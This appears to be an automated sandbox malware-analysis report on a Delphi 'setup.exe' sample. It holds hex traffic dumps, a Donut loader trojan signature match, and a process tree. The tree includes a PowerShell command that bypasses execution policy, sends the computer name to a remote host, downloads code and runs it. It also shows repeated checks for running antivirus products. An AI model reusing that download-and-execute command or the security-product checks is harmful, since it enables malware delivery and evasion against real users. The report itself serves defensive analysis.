                                                                                                                                                                                                                                2024-12-30 18:10:31 UTC1369INData Raw: 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4 ff 65 3d 40 00
                                                                                                                                                                                                                                Data Ascii: @~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@Ce=@
                                                                                                                                                                                                                                2024-12-30 18:10:31 UTC1369INData Raw: 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03
                                                                                                                                                                                                                                Data Ascii: Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(JCopy


                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:13:09:55
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\setup.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'097'152 bytes
                                                                                                                                                                                                                                MD5 hash:D781FD542A1DCB91C07C192BCAC16F8E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                Start time:13:10:29
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?
                                                                                                                                                                                                                                Imagebase:0xe0000
                                                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                Start time:13:10:29
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:13:10:37
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe"
                                                                                                                                                                                                                                Imagebase:0xf50000
                                                                                                                                                                                                                                File size:8'767'044 bytes
                                                                                                                                                                                                                                MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 39%, ReversingLabs
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:13:10:39
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$902A0,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe"
                                                                                                                                                                                                                                Imagebase:0x1d0000
                                                                                                                                                                                                                                File size:3'367'424 bytes
                                                                                                                                                                                                                                MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                Start time:13:10:40
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT
                                                                                                                                                                                                                                Imagebase:0xf50000
                                                                                                                                                                                                                                File size:8'767'044 bytes
                                                                                                                                                                                                                                MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:13:10:41
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp" /SL5="$90262,7785838,845824,C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT
                                                                                                                                                                                                                                Imagebase:0xc00000
                                                                                                                                                                                                                                File size:3'367'424 bytes
                                                                                                                                                                                                                                MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                Start time:13:11:11
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"timeout" 9
                                                                                                                                                                                                                                Imagebase:0x7ff7235d0000
                                                                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                Start time:13:11:11
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6880f0000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                                                                                                Imagebase:0x7ff649240000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:find /I "wrsa.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6566e0000
                                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6880f0000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                Imagebase:0x7ff649240000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:find /I "opssvc.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6566e0000
                                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6880f0000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                Start time:13:11:20
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                                                                                                Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:find /I "avastui.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6566e0000
                                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6880f0000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                                                                                                Imagebase:0x7ff649240000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:find /I "avgui.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6566e0000
                                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6880f0000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                Imagebase:0x7ff649240000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                Start time:13:11:21
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6566e0000
                                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                Start time:13:11:22
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6880f0000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                Start time:13:11:22
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
